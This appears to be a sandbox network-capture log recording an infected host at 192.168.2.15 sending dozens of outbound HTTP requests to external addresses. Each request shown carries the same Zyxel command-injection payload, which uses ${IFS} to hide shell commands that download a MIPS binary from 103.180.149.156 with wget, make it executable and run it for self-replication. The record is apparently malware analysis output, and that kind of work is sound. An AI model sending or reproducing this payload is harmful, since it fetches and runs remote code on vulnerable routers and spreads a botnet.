                                            Feb 2, 2024 06:21:21.833687067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6860192.168.2.153967488.50.254.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833718061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6861192.168.2.1540750149.71.52.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833741903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6862192.168.2.154621248.210.3.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833779097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6863192.168.2.1558166198.203.107.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833827019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6864192.168.2.1550348209.108.159.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833852053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6865192.168.2.1540014142.88.116.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833898067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6866192.168.2.1551270149.226.48.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833920002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6867192.168.2.1541816121.88.213.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833978891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6868192.168.2.1537242165.5.30.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834019899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6869192.168.2.153777625.243.110.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834059000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6870192.168.2.1541824130.16.126.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834079027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6871192.168.2.1540430106.62.113.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834116936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6872192.168.2.1537528134.35.23.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834137917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6873192.168.2.1543420161.85.250.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834163904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6874192.168.2.1538196164.128.212.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834199905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6875192.168.2.1545976109.218.224.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834239006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6876192.168.2.155175474.101.246.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834285021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6877192.168.2.155154625.206.173.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834316969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6878192.168.2.155284684.18.7.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834358931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6879192.168.2.153697639.133.201.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834409952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6880192.168.2.153625464.87.200.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834446907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6881192.168.2.15379881.36.236.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834472895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6882192.168.2.155126644.204.106.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834523916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6883192.168.2.1537490190.203.61.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834569931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6884192.168.2.1560320134.60.2.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834616899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6885192.168.2.1553442170.52.100.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834655046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6886192.168.2.155072234.119.233.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834676027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6887192.168.2.1541814142.81.112.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834698915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6888192.168.2.154425847.91.178.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834753990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6889192.168.2.1556622155.103.8.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834780931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6890192.168.2.1534902130.62.239.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834824085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6891192.168.2.1540030187.242.175.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834863901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6892192.168.2.1544572133.63.47.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834908009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6893192.168.2.1556484200.80.124.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834933043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6894192.168.2.154869424.30.248.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834989071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6895192.168.2.1546420182.34.99.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.834995031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6896192.168.2.1541034219.105.101.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.835024118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6897192.168.2.1541496219.59.126.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.835067034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6898192.168.2.1545422128.54.110.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.835120916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6899192.168.2.155034654.0.160.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.835139990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6900192.168.2.1543354107.75.193.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.835179090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6901192.168.2.155058453.86.106.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.835206032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6902192.168.2.1540930163.161.185.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.835242987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6903192.168.2.1560252148.102.24.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.835274935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6904192.168.2.1542992175.74.225.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.837819099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6905192.168.2.153591037.156.89.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.838571072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6906192.168.2.1549092202.240.153.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.838596106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6907192.168.2.1538290182.88.160.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.838648081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6908192.168.2.1554158142.148.186.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.838675022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6909192.168.2.1541560150.42.174.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.838707924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6910192.168.2.1551720158.156.120.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.838773012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6911192.168.2.154144437.182.8.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.838799953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6912192.168.2.1536470220.126.55.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.838835955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6913192.168.2.1534826132.173.128.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.838887930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6914192.168.2.1533666109.40.167.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.838922977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6915192.168.2.1545898207.63.253.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.838956118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6916192.168.2.154942027.172.63.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.838985920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6917192.168.2.154641653.4.56.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.839046955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6918192.168.2.15580245.152.87.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.839076042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6919192.168.2.155798258.250.213.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.839102030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6920192.168.2.1536480106.66.102.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.839158058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6921192.168.2.1543810172.82.30.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.839176893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6922192.168.2.1547920195.54.68.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.839207888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6923192.168.2.1537614143.161.56.182443
                                            TimestampBytes transferredDirectionData
